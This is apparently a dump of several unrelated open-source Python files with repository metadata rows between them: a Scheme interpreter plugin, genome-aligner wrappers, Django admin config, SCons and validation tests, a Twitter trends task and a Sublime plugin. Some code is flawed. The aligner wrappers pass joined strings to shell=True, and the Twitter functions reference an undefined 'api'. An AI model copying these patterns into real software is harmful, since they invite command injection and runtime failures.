elif not rest and len(args2) > len(args):
raise SchemeException(arguments_error % _('exactly'))
else:
env3.update(dict(zip(args, args2)))
if rest:
env3.update({rest: args2[len(args):]})
return eval_scheme(expr, env3)
f.__name__ = 'scheme_%s' % py2scheme(tree)
return f
def scm_begin(tree, env):
for arg in tree[1:-1]:
eval_scheme(arg)
return eval_scheme(tree[-1])
def scm_set(tree, env):
try:
self, name, value = tree
except ValueError:
raise SchemeException(ARGUMENTS_ERROR %
('set!', _('exactly'), 2, len(tree)-1, py2scheme(tree)))
env[name] = value
DEFAULT_ENV = [
('lambda', scm_lambda),
('begin', scm_begin),
('set!', scm_set),
]
# Add some math operators
DEFAULT_ENV += map(lambda x:(x[0], schemify_math(x[1])), (
('+', operator.add),
('-', operator.sub),
('*', operator.mul),
('/', operator.truediv),
))
DEFAULT_ENV = dict(DEFAULT_ENV)
def parse_scheme(code, start=0, end=None, unpack=False):
if end is None:
end = len(code)-1
while code[start] == ' ':
start += 1
while code[end] == ' ':
end -= 1
if code[start] == '(' and code[end] == ')':
return parse_scheme(code, start+1, end-1, unpack=False)
level = 0
in_string = False
escaped = False
tokens = []
token_start = start
for i in xrange(start, end+1):
if code[i] == '"' and not escaped:
in_string = not in_string
elif in_string:
pass
elif code[i] == '\'':
escaped = not escaped
elif code[i] == '(':
level += 1
elif code[i] == ')':
level -=1
if level == -1:
raise SchemeException(_('At index %i, unexpected `)\' near %s')
% (end, code[max(0, end-10):end+10]))
elif level == 0:
tokens.append(parse_scheme(code, token_start, i))
token_start = i+1
elif level == 0 and code[i] == ' ' and token_start != i:
tokens.append(parse_scheme(code, token_start, i))
token_start = i+1
else:
continue # Nothing to do
if level != 0:
raise SchemeException(_('Unclosed parenthesis in: %s') %
code[start:end+1])
if start == token_start:
return code[start:end+1]
elif start < end:
tokens.append(parse_scheme(code, token_start, end))
tokens = filter(bool, tokens)
if unpack:
assert len(tokens) == 1, tokens
tokens = tokens[0]
return tokens
def eval_scheme(tree, env=DEFAULT_ENV):
if isinstance(tree, str):
if tree in env:
return env[tree]
else:
print(repr(env))
raise SchemeException(_('Undefined keyword %s.') % tree)
first = eval_scheme(tree[0])
if callable(first):
return first(tree, env)
else:
return tree
def eval_scheme_result(tree):
if isinstance(tree, list):
return '(%s)' % ' '.join(map(eval_scheme_result, tree))
else:
return str(eval_argument(tree, []))
@internationalizeDocstring
class Scheme(callbacks.Plugin):
"""Add the help for "@plugin help Scheme" here
This should describe *how* to use this plugin."""
threaded = True
@internationalizeDocstring
def scheme(self, irc, msg, args, code):
"""<code>
Evaluates Scheme."""
try:
tree = parse_scheme(code)
except SchemeException as e:
irc.error('Syntax error: ' + e.args[0], Raise=True)
try:
result = eval_scheme(tree)
except SchemeException as e:
irc.error('Runtime error: ' + e.args[0], Raise=True)
irc.reply(eval_scheme_result(result))
scheme = wrap(scheme, ['text'])
Class = Scheme
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
gpl-3.0
| 7,687,150,768,596,833,000 | 31.186047 | 79 | 0.596339 | false |
Multiscale-Genomics/mg-process-fastq
|
tool/aligner_utils.py
|
1
|
16998
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import shlex
import subprocess
import os
import os.path
import shutil
import tarfile
from utils import logger
from tool.common import cd
from tool.bam_utils import bamUtils
class alignerUtils(object): # pylint: disable=invalid-name
"""
Functions for downloading and processing N-seq FastQ files. Functions
provided allow for the downloading and indexing of the genome assemblies.
"""
def __init__(self):
"""
Initialise the module
"""
logger.info("Alignment Utils")
@staticmethod
def replaceENAHeader(file_path, file_out):
"""
The ENA header has pipes in the header as part of the stable_id. This
function removes the ENA stable_id and replaces it with the final
section after splitting the stable ID on the pipe.
"""
with open(file_out, 'w') as new_file:
with open(file_path) as old_file:
for line in old_file:
if line[0] == '>':
space_line = line.split(" ")
new_file.write(">" + space_line[0].split("|")[-1].replace(">", "") + "\n")
else:
new_file.write(line)
return True
@staticmethod
def gem_index_genome(genome_file, index_name=None):
"""
Create an index of the genome FASTA file with GEM. These are saved
alongside the assembly file.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
"""
if not index_name:
index_name = genome_file
command_line = 'gem-indexer -i ' + genome_file + ' -o ' + index_name
args = shlex.split(command_line)
process = subprocess.Popen(args)
process.wait()
return True
@staticmethod
def bowtie_index_genome(genome_file):
"""
Create an index of the genome FASTA file with Bowtie2. These are saved
alongside the assembly file.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
"""
file_name = os.path.split(genome_file)
bt2_1_name = genome_file + ".1.bt2"
bt2_2_name = genome_file + ".2.bt2"
bt2_3_name = genome_file + ".3.bt2"
bt2_4_name = genome_file + ".4.bt2"
rev1_bt2_name = genome_file + ".rev.1.bt2"
rev2_bt2_name = genome_file + ".rev.2.bt2"
with cd(file_name[0]):
command_line = 'bowtie2-build ' + genome_file + ' ' + genome_file
args = shlex.split(command_line)
process = subprocess.Popen(args)
process.wait()
return (bt2_1_name, bt2_2_name, bt2_3_name, bt2_4_name, rev1_bt2_name, rev2_bt2_name)
def bowtie2_untar_index(self, genome_name, tar_file, # pylint: disable=too-many-arguments
bt2_1_file, bt2_2_file, bt2_3_file, bt2_4_file,
bt2_rev1_file, bt2_rev2_file):
"""
Extracts the BWA index files from the genome index tar file.
Parameters
----------
genome_file_name : str
Location string of the genome fasta file
tar_file : str
Location of the Bowtie2 index file
bt2_1_file : str
Location of the amb index file
bt2_2_file : str
Location of the ann index file
bt2_3_file : str
Location of the bwt index file
bt2_4_file : str
Location of the pac index file
bt2_rev1_file : str
Location of the sa index file
bt2_rev2_file : str
Location of the sa index file
Returns
-------
bool
Boolean indicating if the task was successful
"""
index_files = {
"1.bt2": bt2_1_file,
"2.bt2": bt2_2_file,
"3.bt2": bt2_3_file,
"4.bt2": bt2_4_file,
"rev.1.bt2": bt2_rev1_file,
"rev.2.bt2": bt2_rev2_file,
}
return self._untar_index(genome_name, tar_file, index_files)
@staticmethod
def bwa_index_genome(genome_file):
"""
Create an index of the genome FASTA file with BWA. These are saved
alongside the assembly file. If the index has already been generated
then the locations of the files are returned
Parameters
----------
genome_file : str
Location of the assembly file in the file system
Returns
-------
amb_file : str
Location of the amb file
ann_file : str
Location of the ann file
bwt_file : str
Location of the bwt file
pac_file : str
Location of the pac file
sa_file : str
Location of the sa file
Example
-------
.. code-block:: python
:linenos:
from tool.aligner_utils import alignerUtils
au_handle = alignerUtils()
indexes = au_handle.bwa_index_genome('/<data_dir>/human_GRCh38.fa.gz')
print(indexes)
"""
command_line = 'bwa index ' + genome_file
amb_name = genome_file + '.amb'
ann_name = genome_file + '.ann'
bwt_name = genome_file + '.bwt'
pac_name = genome_file + '.pac'
sa_name = genome_file + '.sa'
if os.path.isfile(bwt_name) is False:
args = shlex.split(command_line)
process = subprocess.Popen(args)
process.wait()
return (amb_name, ann_name, bwt_name, pac_name, sa_name)
def bwa_untar_index(self, genome_name, tar_file, # pylint: disable=too-many-arguments
amb_file, ann_file, bwt_file, pac_file, sa_file):
"""
Extracts the BWA index files from the genome index tar file.
Parameters
----------
genome_file_name : str
Location string of the genome fasta file
genome_idx : str
Location of the BWA index file
amb_file : str
Location of the amb index file
ann_file : str
Location of the ann index file
bwt_file : str
Location of the bwt index file
pac_file : str
Location of the pac index file
sa_file : str
Location of the sa index file
Returns
-------
bool
Boolean indicating if the task was successful
"""
index_files = {
"amb": amb_file,
"ann": ann_file,
"bwt": bwt_file,
"pac": pac_file,
"sa": sa_file
}
return self._untar_index(genome_name, tar_file, index_files)
@staticmethod
def _untar_index(genome_name, tar_file, index_files):
"""
Untar the specified files for a genomic index into the specified
location.
Parameters
----------
genome_name : str
Name of the genome for the folder within the tar file
tar_file : str
Location of the tarred index files
index_files : dict
Dictionary object of the suffix and final index file location
"""
try:
g_dir = os.path.split(tar_file)[0]
tar = tarfile.open(tar_file)
tar.extractall(path=g_dir)
tar.close()
gidx_folder = tar_file.replace('.tar.gz', '/') + genome_name
piece_size = 5120000 # 500MB
for suffix in list(index_files.keys()):
with open(index_files[suffix], "wb") as f_out:
with open(gidx_folder + "." + suffix, "rb") as f_in:
while True:
piece = f_in.read(piece_size)
if not piece:
break # end of file
print("PIECE:", piece[0:5])
f_out.write(piece)
shutil.rmtree(tar_file.replace('.tar.gz', ''))
except (OSError, IOError) as error:
logger.fatal("UNTAR: I/O error({0}): {1}".format(error.errno, error.strerror))
return False
return True
@staticmethod
def bowtie2_align_reads(
genome_file, bam_loc, params, reads_file_1, reads_file_2=None):
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
reads = ["-U", reads_file_1]
if reads_file_2 is not None:
reads = [
"-1", reads_file_1,
"-2", reads_file_2
]
logger.info(genome_file)
logger.info(' '.join(params))
cmd_aln = ' '.join([
'bowtie2',
'-p 4',
'-x', genome_file,
'-S', reads_file_1 + '.sam',
' '.join(params),
] + reads)
try:
logger.info("BOWTIE2 COMMAND: " + cmd_aln)
process = subprocess.Popen(cmd_aln, shell=True)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_aln))
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file_1 + '.sam', bam_loc)
if return_val:
os.remove(reads_file_1 + '.sam')
else:
logger.warn("IO error with {} to {}".format(reads_file_1 + '.sam', bam_loc))
return return_val
def _bwa_aln_sai(self, genome_file, reads_file, params, single=True): # pylint: disable=no-self-use
"""
Generate the sai files required for creating the sam file.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
params : dict
Dictionary of the parameters for bwa aln
single : bool
True for single ended, will use 4 threads for processing
False for paired end, will use 2 threads for processing
"""
threads = "2"
if single:
threads = "4"
cmd_aln_sai = ' '.join([
'bwa aln',
'-t', threads,
'-q', '5',
' '.join(params),
'-f', reads_file + '.sai',
genome_file, reads_file
])
try:
logger.info("BWA ALN COMMAND: " + cmd_aln_sai)
process = subprocess.Popen(cmd_aln_sai, shell=True)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_aln_sai))
def bwa_aln_align_reads_single(self, genome_file, reads_file, bam_loc, params):
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
cmd_samse = ' '.join([
'bwa samse',
'-f', reads_file + '.sam',
genome_file, reads_file + '.sai', reads_file
])
self._bwa_aln_sai(genome_file, reads_file, params, True)
try:
logger.info("BWA ALN COMMAND: " + cmd_samse)
process = subprocess.Popen(
cmd_samse, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
proc_out, proc_err = process.communicate() # pylint: disable=unused-variable
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_samse))
proc_out, proc_err = process.communicate()
logger.fatal("BWA ALN stderr" + proc_err)
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file + '.sam', bam_loc)
if return_val:
os.remove(reads_file + '.sam')
os.remove(reads_file + '.sai')
else:
logger.warn("IO error with {} to {}".format(reads_file + '.sam', bam_loc))
return return_val
def bwa_aln_align_reads_paired(self, genome_file, reads_file_1, reads_file_2, bam_loc, params): # pylint: disable=too-many-arguments
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
cmd_samse = ' '.join([
'bwa sampe',
'-f', reads_file_1 + '.sam',
genome_file,
reads_file_1 + '.sai', reads_file_2 + '.sai',
reads_file_1, reads_file_2
])
try:
import multiprocessing
f1_proc = multiprocessing.Process(
name='fastq_1', target=self._bwa_aln_sai,
args=(genome_file, reads_file_1, params, False)
)
f2_proc = multiprocessing.Process(
name='fastq_2', target=self._bwa_aln_sai,
args=(genome_file, reads_file_2, params, False)
)
f1_proc.start()
f2_proc.start()
f1_proc.join()
f2_proc.join()
except (OSError, IOError) as msg:
logger.info("SAI ERROR: I/O error({0}): {1}".format(
msg.errno, msg.strerror))
return False
try:
logger.info("BWA ALN COMMAND: " + cmd_samse)
process = subprocess.Popen(cmd_samse, shell=True)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_samse))
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file_1 + '.sam', bam_loc)
if return_val:
os.remove(reads_file_1 + '.sam')
os.remove(reads_file_1 + '.sai')
os.remove(reads_file_2 + '.sai')
else:
logger.warn("IO error with {} to {}".format(reads_file_1 + '.sam', bam_loc))
return return_val
@staticmethod
def bwa_mem_align_reads(
genome_file, bam_loc, params, reads_file_1, reads_file_2=None):
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
reads = [reads_file_1]
if reads_file_2 is not None:
reads.append(reads_file_2)
cmd_aln = ' '.join([
'bwa mem -t 4',
' '.join(params),
genome_file
] + reads)
try:
with open(reads_file_1 + '.sam', "w") as f_out:
logger.info("BWA MEM COMMAND: " + cmd_aln)
process = subprocess.Popen(cmd_aln, shell=True, stdout=f_out)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_aln))
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file_1 + '.sam', bam_loc)
if return_val:
os.remove(reads_file_1 + '.sam')
else:
logger.warn("IO error with {} to {}".format(reads_file_1 + '.sam', bam_loc))
return return_val
|
apache-2.0
| 5,386,583,190,350,845,000 | 30.951128 | 137 | 0.527062 | false |
BirkbeckCTP/janeway
|
src/review/admin.py
|
1
|
3043
|
__copyright__ = "Copyright 2017 Birkbeck, University of London"
__author__ = "Martin Paul Eve & Andy Byers"
__license__ = "AGPL v3"
__maintainer__ = "Birkbeck Centre for Technology and Publishing"
from django.contrib import admin
from review import models
class EditorialAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'editor', 'editor_type', 'assigned')
list_filter = ('article', 'editor', 'editor_type')
raw_id_fields = ('article', 'editor')
class ReviewRoundAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'round_number', 'date_started')
list_filter = ('article',)
raw_id_fields = ('article',)
filter_horizontal = ('review_files',)
class ReviewAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'reviewer', 'editor', 'review_round', 'decision', 'date_due', 'is_complete')
list_filter = ('article', 'reviewer', 'editor')
raw_id_fields = ('article', 'reviewer', 'editor', 'review_round', 'form')
class ReviewFormAdmin(admin.ModelAdmin):
list_display = ('name', 'journal', 'slug', 'deleted')
list_filter = ('journal', 'deleted')
filter_horizontal = ('elements',)
class ElementAdmin(admin.ModelAdmin):
list_display = ('name', 'kind', 'required', 'order', 'width')
class AnswerAdmin(admin.ModelAdmin):
list_display = ('pk', 'assignment', 'frozen_element', 'author_can_see')
list_filter = ('assignment',)
raw_id_fields = ('assignment',)
class RatingAdmin(admin.ModelAdmin):
list_display = ('pk', 'reviewer', 'rating', 'rater')
list_filter = ('assignment', 'rater')
raw_id_fields = ('assignment', 'rater')
def reviewer(self, obj):
return obj.assignment.reviewer
class RevisionActionAdmin(admin.ModelAdmin):
list_display = ('pk', 'logged', 'user')
class RevisionAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'editor', 'date_requested', 'date_due')
list_filter = ('article', 'editor')
raw_id_fields = ('article', 'editor')
filter_horizontal = ('actions',)
class EditorOverrideAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'editor', 'overwritten')
list_filter = ('article', 'editor')
raw_id_fields = ('article', 'editor')
class DraftAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'section_editor', 'decision', 'drafted', 'editor_decision')
list_filter = ('article', 'section_editor', 'decision', 'editor_decision')
raw_id_fields = ('article', 'section_editor')
admin_list = [
(models.EditorAssignment, EditorialAdmin),
(models.ReviewAssignment, ReviewAdmin),
(models.ReviewForm, ReviewFormAdmin),
(models.ReviewFormElement, ElementAdmin),
(models.ReviewAssignmentAnswer, AnswerAdmin),
(models.ReviewRound, ReviewRoundAdmin),
(models.ReviewerRating, RatingAdmin),
(models.RevisionAction, RevisionActionAdmin),
(models.RevisionRequest, RevisionAdmin),
(models.EditorOverride, EditorOverrideAdmin),
(models.DecisionDraft, DraftAdmin),
]
[admin.site.register(*t) for t in admin_list]
|
agpl-3.0
| -8,894,576,554,807,835,000 | 32.43956 | 113 | 0.669405 | false |
EmanueleCannizzaro/scons
|
test/scons-time/obj/file.py
|
1
|
2296
|
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/scons-time/obj/file.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that config files specified with the -f and --file options
affect how the obj subcommand processes things.
"""
import TestSCons_time
test = TestSCons_time.TestSCons_time()
test.fake_logfile('foo-001-0.log')
test.fake_logfile('foo-002-0.log')
test.write('st1.conf', """\
prefix = 'foo-001'
""")
expect1 = """\
pre-read post-read pre-build post-build
16010 16020 16030 16040 foo-001-0.log
"""
test.run(arguments = 'obj -f st1.conf Node.FS.Base', stdout = expect1)
test.write('st2.conf', """\
prefix = 'foo'
title = 'ST2.CONF TITLE'
vertical_bars = (
( 1.5, 7, None ),
)
""")
expect2 = \
r"""set title "ST2.CONF TITLE"
set key bottom left
plot '-' title "Startup" with lines lt 1, \
'-' notitle with lines lt 7
# Startup
1 16040.000
2 16040.000
e
1.5 0
1.5 18000
e
"""
test.run(arguments = 'obj --file st2.conf --fmt gnuplot Node.FS.Base', stdout = expect2)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
mit
| -6,706,845,236,707,202,000 | 26.333333 | 101 | 0.70993 | false |
google/starthinker
|
starthinker/task/twitter/run.py
|
1
|
4957
|
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
# SEE: https://github.com/geduldig/TwitterAPI
# SEE: https://developer.twitter.com/en/docs/basics/rate-limits
from time import sleep
from TwitterAPI import TwitterAPI
from starthinker.util.data import get_rows, put_rows
# FOR WOEID SEE
# http://cagricelebi.com/blog/dear-twitter-please-stop-using-woeid/
# https://archive.org/details/geoplanet_data_7.10.0.zip
# https://github.com/Ray-SunR/woeid
# https://stackoverflow.com/questions/12434591/get-woeid-from-city-name
TWITTER_API = None
def get_twitter_api(config, task):
global TWITTER_API
if TWITTER_API is None:
TWITTER_API = TwitterAPI(
task['key'], task['secret'], auth_type='oAuth2')
return TWITTER_API
TWITTER_TRENDS_PLACE_SCHEMA = [
{
'name': 'Woeid',
'type': 'INTEGER'
},
{
'name': 'Name',
'type': 'STRING'
},
{
'name': 'Url',
'type': 'STRING'
},
{
'name': 'Promoted_Content',
'type': 'STRING',
'mode': 'NULLABLE'
},
{
'name': 'Query',
'type': 'STRING',
},
{
'name': 'Tweet_Volume',
'type': 'INTEGER'
},
]
def twitter_trends_places(config, task):
if config.verbose:
print('TWITTER TRENDS PLACE')
print('PL',
list(get_rows(config, task['auth'], task['trends']['places'])))
for place in get_rows(config, task['auth'], task['trends']['places']):
if config.verbose:
print('PLACE', place)
results = get_twitter_api(config, task).request('trends/place', {'id': int(place)})
for r in results:
if config.verbose:
print('RESULT', r['name'])
yield [
place, r['name'], r['url'], r['promoted_content'], r['query'],
r['tweet_volume']
]
print('.', end='')
sleep(15 * 60 / 75) # rate limit ( improve to retry )
TWITTER_TRENDS_CLOSEST_SCHEMA = [
{
'name': 'Latitude',
'type': 'FLOAT'
},
{
'name': 'Longitude',
'type': 'FLOAT'
},
{
'name': 'Country',
'type': 'STRING'
},
{
'name': 'Country_Code',
'type': 'STRING'
},
{
'name': 'Name',
'type': 'STRING',
'mode': 'NULLABLE'
},
{
'name': 'Parent_Id',
'type': 'INTEGER',
},
{
'name': 'Place_Type_Code',
'type': 'INTEGER'
},
{
'name': 'Place_Type_Name',
'type': 'STRING'
},
{
'name': 'URL',
'type': 'STRING'
},
{
'name': 'Woeid',
'type': 'INTEGER'
},
]
def twitter_trends_closest(config, task):
if config.verbose:
print('TWITTER TRENDS CLOSEST')
for row in get_rows(config, task['auth'], task['trends']['closest']):
lat, lon = row[0], row[1]
results = api.request('trends/closest', {'lat': lat, 'long': lon})
for r in results:
yield [
lat, lon, r['country'], r['countryCode'], r['name'], r['parentid'],
r['placeType']['code'], r['placeType']['name'], r['url'], r['woeid']
]
TWITTER_TRENDS_AVAILABLE_SCHEMA = TWITTER_TRENDS_CLOSEST_SCHEMA
def twitter_trends_available(config, task):
if config.verbose:
print('TWITTER TRENDS AVAILABLE')
results = api.request('trends/available', {})
for r in results:
yield [
r['country'], r['countryCode'], r['name'], r['parentid'],
r['placeType']['code'], r['placeType']['name'], r['url'], r['woeid']
]
def twitter(config, task):
if config.verbose:
print('TWITTER')
rows = None
if 'trends' in task:
if 'places' in task['trends']:
rows = twitter_trends_places(config, task)
task['out']['bigquery']['schema'] = TWITTER_TRENDS_PLACE_SCHEMA
task['out']['bigquery']['skip_rows'] = 0
elif 'closest' in task['trends']:
rows = twitter_trends_closest(config, task)
task['out']['bigquery']['schema'] = TWITTER_TRENDS_CLOSEST_SCHEMA
task['out']['bigquery']['skip_rows'] = 0
else:
rows = twitter_trends_available(config, task)
task['out']['bigquery'][
'schema'] = TWITTER_TRENDS_AVAILABLE_SCHEMA
task['out']['bigquery']['skip_rows'] = 0
if rows:
put_rows(config, task['auth'], task['out'], rows)
|
apache-2.0
| -3,063,663,681,258,404,400 | 25.367021 | 87 | 0.556385 | false |
facelessuser/SublimeRandomCrap
|
sublime_info.py
|
1
|
2894
|
"""
SublimeInfo Sublime Plugin.
Show info about the system and the current Sublime Text instance.
```
//////////////////////////////////
// Info Commands
//////////////////////////////////
{
"caption": "Sublime Info",
"command": "sublime_info"
},
```
Licensed under MIT
Copyright (c) 2013-2019 Isaac Muse <isaacmuse@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import socket
import sublime
import sublime_plugin
import urllib.request as urllibreq
import traceback
INFO = '''
Platform: {platform}
Hostname: {hostname}
Sublime Version: {version}
Architecture: {arch}
Local IP: {l_ip}
External IP: {e_ip}
'''
def external_ip():
"""Get external IP."""
try:
with urllibreq.urlopen("https://www.myexternalip.com/raw") as url:
e_ip = url.read().decode("utf-8")
except Exception:
e_ip = "???"
print(traceback.format_exc())
return e_ip
def local_ip():
"""Get local IP address."""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
l_ip = s.getsockname()[0]
except Exception:
l_ip = '???'
print(traceback.format_exc())
finally:
s.close()
return l_ip
class SublimeInfoCommand(sublime_plugin.ApplicationCommand):
"""Sublime info command."""
def run(self):
"""Run the command."""
info = {
"platform": sublime.platform(),
"hostname": socket.gethostname().lower(),
"version": sublime.version(),
"arch": sublime.arch(),
"l_ip": local_ip(),
"e_ip": external_ip()
}
msg = INFO.format(**info)
# Show in a dialog, console, and copy to clipboard
sublime.message_dialog(msg)
sublime.set_clipboard(msg)
print("\nSublimeInfo: {}".format(msg))
|
mit
| 4,477,997,650,787,414,000 | 28.835052 | 111 | 0.64029 | false |
forseti-security/forseti-security
|
tests/common/gcp_api/test_data/http_mocks.py
|
1
|
1281
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test data for firewall api responses."""
from googleapiclient import http
from google.cloud.forseti.common.gcp_api import _base_repository
def mock_http_response(response, status='200'):
"""Set the mock response to an http request."""
http_mock = http.HttpMock()
http_mock.response_headers = {
'status': status,
'content-type': 'application/json',
}
http_mock.data = response
_base_repository.LOCAL_THREAD.http = http_mock
def mock_http_response_sequence(responses):
"""Set the mock response to an http request."""
http_mock = http.HttpMockSequence(responses)
_base_repository.LOCAL_THREAD.http = http_mock
|
apache-2.0
| -2,179,051,821,347,928,800 | 35.6 | 74 | 0.729899 | false |
fedspendingtransparency/data-act-broker-backend
|
tests/unit/dataactbroker/test_validation_helper.py
|
1
|
24369
|
import pandas as pd
from pandas.util.testing import assert_frame_equal
import numpy as np
import os
from dataactbroker.helpers import validation_helper
from dataactvalidator.app import ValidationManager, ValidationError
from dataactvalidator.filestreaming.csvReader import CsvReader
from dataactcore.models.validationModels import FileColumn
from dataactcore.models.lookups import FIELD_TYPE_DICT
FILES_DIR = os.path.join('tests', 'integration', 'data')
READ_ERROR = os.path.join(FILES_DIR, 'appropReadError.csv')
BLANK_C = os.path.join(FILES_DIR, 'awardFinancialBlank.csv')
def test_is_valid_type():
assert validation_helper.is_valid_type(None, 'STRING') is True
assert validation_helper.is_valid_type(None, 'STRING') is True
assert validation_helper.is_valid_type(None, 'INT') is True
assert validation_helper.is_valid_type(None, 'DECIMAL') is True
assert validation_helper.is_valid_type(None, 'BOOLEAN') is True
assert validation_helper.is_valid_type(None, 'LONG') is True
assert validation_helper.is_valid_type('1234Test', 'STRING') is True
assert validation_helper.is_valid_type('1234Test', 'INT') is False
assert validation_helper.is_valid_type('1234Test', 'DECIMAL') is False
assert validation_helper.is_valid_type('1234Test', 'BOOLEAN') is False
assert validation_helper.is_valid_type('1234Test', 'LONG') is False
assert validation_helper.is_valid_type('', 'STRING') is True
assert validation_helper.is_valid_type('', 'INT') is True
assert validation_helper.is_valid_type('', 'DECIMAL') is True
assert validation_helper.is_valid_type('', 'BOOLEAN') is True
assert validation_helper.is_valid_type('', 'LONG') is True
assert validation_helper.is_valid_type('01234', 'STRING') is True
assert validation_helper.is_valid_type('01234', 'INT') is True
assert validation_helper.is_valid_type('01234', 'DECIMAL') is True
assert validation_helper.is_valid_type('01234', 'LONG') is True
assert validation_helper.is_valid_type('01234', 'BOOLEAN') is False
assert validation_helper.is_valid_type('1234.0', 'STRING') is True
assert validation_helper.is_valid_type('1234.0', 'INT') is False
assert validation_helper.is_valid_type('1234.00', 'DECIMAL') is True
assert validation_helper.is_valid_type('1234.0', 'LONG') is False
assert validation_helper.is_valid_type('1234.0', 'BOOLEAN') is False
def test_clean_col():
# None cases
assert validation_helper.clean_col('') is None
assert validation_helper.clean_col(' ') is None
assert validation_helper.clean_col('\n') is None
assert validation_helper.clean_col('\"\"') is None
assert validation_helper.clean_col(np.nan) is None
assert validation_helper.clean_col(None) is None
# clean cases
